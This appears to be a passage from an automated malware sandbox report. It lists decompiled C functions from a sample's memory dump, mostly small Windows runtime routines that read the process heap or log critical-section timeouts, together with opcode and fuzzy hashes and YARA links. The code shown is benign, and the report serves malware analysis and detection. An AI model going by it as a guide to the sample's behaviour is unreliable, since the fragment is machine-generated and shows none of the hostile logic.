            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
            • Instruction ID: d89729662c105884d307b5203176510f611bb23118c6a75aa18fa6d155415027
            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
            • Instruction Fuzzy Hash: 84C08C32080248BBDB126A46CD00F017B29E790B60F000021F6040A6628A32F861D588
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04443A1C, Relevance: .0, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04443A1C(intOrPtr _a4) {
				void* _t5;

				return L04444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




            0x04443a35

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
            • Instruction ID: 2cbb5289cff0d273db172ca2db76b64fba3d0e87d72a8bd2d278becd53a40b67
            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
            • Instruction Fuzzy Hash: 33C04C32180648BBDB126E46DD01F15BB69E794B60F154025B6040A9618576ED61D998
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044536CC, Relevance: .0, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



            0x044536d2
            0x044536e8
            0x044536d4
            0x044536e5
            0x044536e5

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
            • Instruction ID: c92d8aa52b46d685f79656c19717d62b9867a29e376b7dd498507bbf8dbb562a
            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
            • Instruction Fuzzy Hash: F5C09B75155440FBFF256F30CD51F1AB254F740A65F64075D7621499F1D56DBC00E504
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044376E2, Relevance: .0, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




            0x044376e4
            0x00000000
            0x044376f8
            0x044376fd

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
            • Instruction ID: 9beff5037cf76d5845fbe82140e670c4ea16000f4e2586d0e58162078be51704
            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
            • Instruction Fuzzy Hash: 2CC08CB01411805AFF2A6B08CE30B223650AB0CB1AF88019DAA81296A3C368B803C208
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04447D50, Relevance: .0, Instructions: 7COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04447D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




            0x04447d56
            0x04447d5b
            0x04447d60
            0x04447d5d
            0x04447d5d
            0x04447d5d

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
            • Instruction ID: 43e774781926acd1192d65bb9c67643f124b75339c9fe6be88361a9ebfca66d7
            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
            • Instruction Fuzzy Hash: 4DB092343119408FDF16DF28C080B1633E4BB84A40B8400D1E400CBA20D329E8008900
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
            Download Yara Rule
            C-Code - Quality: 53%
            			E044BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0446CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E044B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E044B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










            0x044bfdda
            0x044bfde2
            0x044bfde5
            0x044bfdec
            0x044bfdfa
            0x044bfdff
            0x044bfe0a
            0x044bfe0f
            0x044bfe17
            0x044bfe1e
            0x044bfe19
            0x044bfe19
            0x044bfe19
            0x044bfe20
            0x044bfe21
            0x044bfe22
            0x044bfe25
            0x044bfe40

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044BFDFA
            Strings
            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044BFE2B
            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044BFE01
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
            • API String ID: 885266447-3903918235
            • Opcode ID: f675f86d413e9f294c89a21bfbb2b700a7c7ec23e8065898a43a5a6bc2d24274
            • Instruction ID: 451495e31ac164d5b69a4fd3091019c25ea44ab76d635bc93d1696a078738fec
            • Opcode Fuzzy Hash: f675f86d413e9f294c89a21bfbb2b700a7c7ec23e8065898a43a5a6bc2d24274
            • Instruction Fuzzy Hash: D9F0C8362001417BEE211E45DC01E63BB5AEB45734F240216F668955E1E962B83096F4
            Uniqueness

            Uniqueness Score: -1.00%